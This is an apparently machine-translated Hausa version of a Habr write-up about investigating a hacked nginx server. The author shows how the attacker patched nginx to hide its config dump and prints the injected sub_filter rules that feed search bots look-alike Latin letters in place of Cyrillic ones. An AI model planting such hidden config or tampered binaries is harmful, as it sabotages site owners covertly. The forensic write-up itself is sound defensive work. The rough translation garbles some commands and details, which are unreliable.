Wani labari mara dadi ya faru da daya daga cikin abokaina. Amma kamar yadda abin ya kasance ga Mikhail, ya kasance kamar nishadi a gare ni.
Dole ne in ce abokina yana da yawa UNIX-mai amfani: iya shigar da tsarin da kansa MySQL, php kuma yi saitunan masu sauƙi nginx.
Kuma yana da dozin ko ɗaya da rabi gidajen yanar gizon da aka sadaukar don kayan aikin gini.
Ɗaya daga cikin waɗannan rukunin yanar gizon da aka keɓe don sarƙoƙi yana zaune da ƙarfi a cikin TOP na injunan bincike. Wannan rukunin yanar gizon ba na kasuwanci bane, amma wani ya shiga halin kai hari. Wannan DDoS, sa'an nan mugun karfi, sa'an nan su rubuta batsa comments da aika zagi ga hosting da kuma RKN.
Nan da nan, komai ya lafa kuma wannan natsuwar ya zama bai yi kyau ba, kuma shafin ya fara barin saman layin sakamakon binciken a hankali.
Wannan magana ce, sannan labarin admin din kansa.
Ana gab da yin barci sai wayar ta yi ƙara: “San, ba za ka kalli sabar tawa ba? Da alama an yi min kutse, ba zan iya tabbatar da hakan ba, amma jin bai bar ni ba har mako na uku. Wataƙila lokaci ya yi da zan sami magani don paranoia? ”
Abin da ya biyo baya shi ne tattaunawar rabin sa'a wadda za a iya taƙaita ta kamar haka:
- ƙasa don shiga ba tare da izini ba ta kasance m;
- maharin zai iya samun haƙƙin babban mai amfani;
- harin (idan ya faru) an kai shi ne musamman a wannan wurin;
- An gyara wuraren matsalolin kuma kawai kuna buƙatar fahimtar ko akwai wani shiga;
- hack ɗin ba zai iya shafar lambar rukunin yanar gizon da bayanan bayanai ba.
Game da batu na karshe.
Farin gaban IP ne kawai ke kallon duniya. Babu musaya tsakanin masu baya da gaba sai http(s), masu amfani/ kalmomin shiga sun bambanta, ba a musanya maɓalli. A kan adireshi masu launin toka, duk tashoshin jiragen ruwa ban da 80/443 an rufe su. White backend IPs sani kawai ga masu amfani biyu, waɗanda Mikhail ya amince da su gaba ɗaya.
An shigar a gaban gaba Debian 9 kuma a lokacin da aka yi kiran, tsarin ya keɓe daga duniya ta hanyar wuta ta waje kuma ya tsaya.
"Ok, ba ni dama," Na yanke shawarar kashe barci na awa daya. "Zan gani da idona."
Nan da gaba:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Neman yiwuwar hack
Na fara uwar garken, na farko a ciki yanayin ceto. Ina hawa faifai na juye su gaskiya-katako, tarihin, log log, da dai sauransu, idan zai yiwu, Ina duba kwanakin halittar fayil, ko da yake na fahimci cewa kullun al'ada zai "shafa" bayan kansa, kuma Misha ya riga ya "taka" da yawa yayin da yake neman kansa. .
Na fara a cikin yanayin al'ada, har yanzu ban fahimci ainihin abin da zan nema ba, na yi nazarin configs. Da farko, ina sha'awar nginx tunda, gabaɗaya, babu wani abu a gaba sai shi.
Saitunan ƙanana ne, an tsara su sosai cikin fayiloli guda goma sha biyu, kawai na duba su cat'oh daya bayan daya. Komai kamar yana da tsabta, amma ba ku taɓa sanin ko na rasa wani abu ba sun hada da, bari in yi cikakken jeri:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Ban gane ba: "Ina lissafin?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
An ƙara tambaya ta biyu ga tambayar jeri: "Me yasa irin wannan tsohuwar sigar nginx?"
Bugu da kari, tsarin ya yi imanin cewa an shigar da sabuwar sigar:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
ina kira:
- Misha, me yasa kuka sake haduwa nginx?
- Jira, ban ma san yadda zan yi wannan ba!
- Ok, da kyau, tafi barci...
Nginx an sake gina shi a fili kuma fitar da lissafin ta amfani da "-T" yana ɓoye don dalili. Babu sauran shakku game da hacking kuma za ku iya yarda da shi kawai kuma (tun lokacin da Misha ya maye gurbin uwar garken tare da sabo) la'akari da matsalar da aka warware.
Kuma lallai tunda wani ya samu hakki tushen'ah, to, yana da ma'ana kawai don yin sake shigar da tsarin, kuma ba shi da amfani a nemi abin da ba daidai ba a can, amma a wannan lokacin sha'awar ya ci nasara a barci. Ta yaya za mu iya gano abin da suke so su ɓoye mana?
Bari mu gwada gano:
$ strace nginx -T
Muna kallonsa, a fili babu isassun layuka a cikin alamar a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Don jin daɗi kawai, bari mu kwatanta binciken.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Ina tsammanin wani ɓangare na lambar /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
an kawo form:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
ko
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
don haka ba a nuna lissafin ta "-T" ba.
Amma ta yaya za mu iya duba tsarin mu?
Idan tunanina daidai ne kuma matsalar tana cikin ma'auni ne kawai ngx_dump_config bari mu yi kokarin shigar da shi ta amfani da gdb, an yi sa'a akwai maɓalli --da-cc-opt -g gabatar da fatan cewa ingantawa -O2 ba zai cutar da mu ba. A lokaci guda kuma, tunda ban san yadda ba ngx_dump_config za a iya sarrafa shi a ciki kaso 'T':, Ba za mu kira wannan block ba, amma shigar da shi ta amfani da shi kaso 't':
Me yasa zaka iya amfani da '-t' da '-T'Block Processing idan (ngx_dump_config) faruwa a ciki idan (ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Tabbas, idan an canza lambar a cikin wannan ɓangaren kuma ba a ciki ba kaso 'T':, to hanyata ba za ta yi aiki ba.
Gwada nginx.confBayan an riga an warware matsalar ta gwaji, an tabbatar da cewa ana buƙatar ƙaramin tsari don malware yayi aiki nginx nau'in:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
Za mu yi amfani da shi don taƙaitawa a cikin labarin.
Kaddamar da gyara kuskure
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Mataki-mataki:
- saita hutu a cikin aikin babban ()
- kaddamar da shirin
- canza darajar madaidaicin da ke ƙayyade fitarwa na saitin ngx_dump_config=1
- ci gaba / ƙare shirin
Kamar yadda muke iya gani, ainihin saitin ya bambanta da namu, muna zaɓar yanki na parasitic daga gare ta:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Mu kalli abin da ke faruwa a nan cikin tsari.
Ƙaddara Mai amfani'yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
An cire shafukan sabis wordpress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
Kuma ga wadanda suka fada karkashin duka wadannan sharudda na sama
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
a cikin rubutu html-shafukan canza 'O' a kan 'o' и 'A' a kan 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Haka ne, kawai dabarar ita ce 'a'! = 'a' kamar yadda 'o'! = 'o':
Don haka, bots ɗin injin bincike suna karɓar, maimakon rubutu na 100% na al'ada na Cyrillic, datti da aka gyara da Latin. 'a' и 'o'. Ba na kuskure in tattauna yadda wannan ke shafar SEO, amma yana da wuya cewa irin wannan jumble na haruffa zai sami tasiri mai kyau a kan matsayi a cikin sakamakon binciken.
Me zan iya cewa, maza da tunani.
nassoshi
source: www.habr.com